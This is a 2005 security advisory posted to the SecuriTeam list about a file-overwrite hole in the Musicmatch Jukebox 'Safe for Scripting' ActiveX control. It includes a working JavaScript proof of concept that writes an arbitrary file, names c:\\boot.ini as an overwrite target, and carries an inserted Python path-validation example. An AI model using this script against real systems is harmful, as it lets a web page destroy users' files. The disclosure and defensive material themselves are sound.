[NT] Yahoo Musicmatch Remote File Inclusion

Subject: [NT] Yahoo Musicmatch Remote File Inclusion
Date: 19 Apr 2005 15:11:05 +0200
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com



  Yahoo Musicmatch Remote File Inclusion
------------------------------------------------------------------------


SUMMARY

" <http://musicmatch.com/> Musicmatch Jukebox 10 is the most powerful way 
to find and organize your music, giving you ultimate control of your music 
experience. With a whole new range of library, playlist, and portable 
device controls, Musicmatch Jukebox is more powerful and easier to use 
than ever before." In September 2004 Musicmatch was purchased by Yahoo! 
Inc.

Lack of parameter validation in the Musicmatch ActiveX control allows a remote 
attacker to write files on vulnerable systems.

DETAILS

Vulnerable Systems:
 * Musicmatch versions 10.00.2047 and prior
 * Musicmatch versions 9.00.5059 and prior (according to vendor)

Immune Systems:
 * Musicmatch versions 9 and 10 (fixed versions since 03/21/05)

DiagCollectionControl.dll is an ActiveX control that exposes an interface 
marked Safe for Scripting, with a method called StartDiagCollection defined as 
follows:
Dispatch Function BOOL StartDiagCollection(BSTR bstrSavePath, BSTR bstrUserEnteredInfo, BSTR bstrXMLControlFile, USERDEFINED eRequestType, BOOL bUploadInfo, BOOL bEncryptZipFile, TR numJobs)

In this particular vulnerability, an attacker can pass a malicious value in 
bstrSavePath (e.g. c:\\boot.ini). Once the method is called, whichever file 
is specified is overwritten.

Exploit:
The following is a non-malicious example:
<h1>If you have a vulnerable version a file "foo.txt" has been written to 
the folder "c:\exploit".<br>
<br>It could have been used to overwrite critical system files.</h1>
<script>
var foo;
foo = new ActiveXObject("DiagCollectionControl.DiagCollectionA.1");
foo.StartDiagCollection("c:\\exploit\\foo.txt", "userinfo", "", 1, true, false, "1");
</script>

If you have the vulnerable ActiveX control, a file named foo.txt will be 
created in the c:\exploit directory. Obviously, much worse can be done, as 
there are no restrictions on which files can be overwritten, assuming the 
user has access to them. It may be possible to control the data that goes 
into the file as well, although I have not yet identified a method for 
doing this.
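The defect described above is a caller-supplied save path that the control writes to without any check. The following is an added example (not code from the advisory or from Musicmatch) of the validation such a Safe-for-Scripting control should apply before writing: it confines bstrSavePath to one allowed directory (the hypothetical ALLOWED_ROOT, set here to c:\exploit to match the advisory's test) and, as a second helper, classifies a version string against the vulnerable builds the advisory lists.

```python
from pathlib import PureWindowsPath

# Hypothetical directory the control is permitted to write into (assumption).
ALLOWED_ROOT = PureWindowsPath(r"C:\exploit")

# Last vulnerable builds named in the advisory, keyed by major version.
LAST_VULNERABLE = {10: (10, 0, 2047), 9: (9, 0, 5059)}


def is_vulnerable_version(version: str) -> bool:
    """True if a Musicmatch version string (e.g. '10.00.2047') is at or below
    the last vulnerable build for its major version; unknown majors give False."""
    try:
        parts = tuple(int(x) for x in version.split("."))
    except ValueError:
        return False
    limit = LAST_VULNERABLE.get(parts[0])
    return limit is not None and parts[:3] <= limit


def is_safe_save_path(requested: str, allowed_root: PureWindowsPath = ALLOWED_ROOT) -> bool:
    """True only if `requested` names a file strictly inside allowed_root.

    Rejects relative and drive-relative paths, UNC paths, embedded NULs, and
    any '..' that would climb out of the allowed directory
    (e.g. C:\\exploit\\..\\boot.ini). Comparison is lexical, so the check
    does not depend on the file system state."""
    if not requested or "\x00" in requested:
        return False
    p = PureWindowsPath(requested)
    # is_absolute() needs both a drive and a root; UNC drives start with '\\'.
    if not p.is_absolute() or p.drive.startswith("\\\\"):
        return False
    # pathlib collapses '.' but keeps '..', so resolve '..' lexically here.
    resolved = []
    for part in p.parts[1:]:            # parts[0] is the anchor, e.g. 'C:\\'
        if part == "..":
            if not resolved:
                return False            # would climb above the drive root
            resolved.pop()
        elif part != ".":
            resolved.append(part)
    # Windows paths are case-insensitive; compare lower-cased components.
    normalized = [s.lower() for s in (p.anchor, *resolved)]
    root = [s.lower() for s in allowed_root.parts]
    # Must start with the allowed root and name something below it, not the root itself.
    return normalized[:len(root)] == root and len(normalized) > len(root)
```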

Patch Availability:
The following links can be used to find more information on the patch and 
the vulnerability:
 * Musicmatch Jukebox Security Updates: <http://www.musicmatch.com/download/free/security.htm>
 * Security FAQ: <http://www.musicmatch.com/info/user_guide/faq/security_updates.htm>


ADDITIONAL INFORMATION

The information has been provided by Robert Fly <mailto:robfly@hyperdose.com>.
The original articles can be found at:
 * http://www.hyperdose.com/advisories/H2005-02.txt
 * http://www.hyperdose.com/advisories/H2005-03.txt


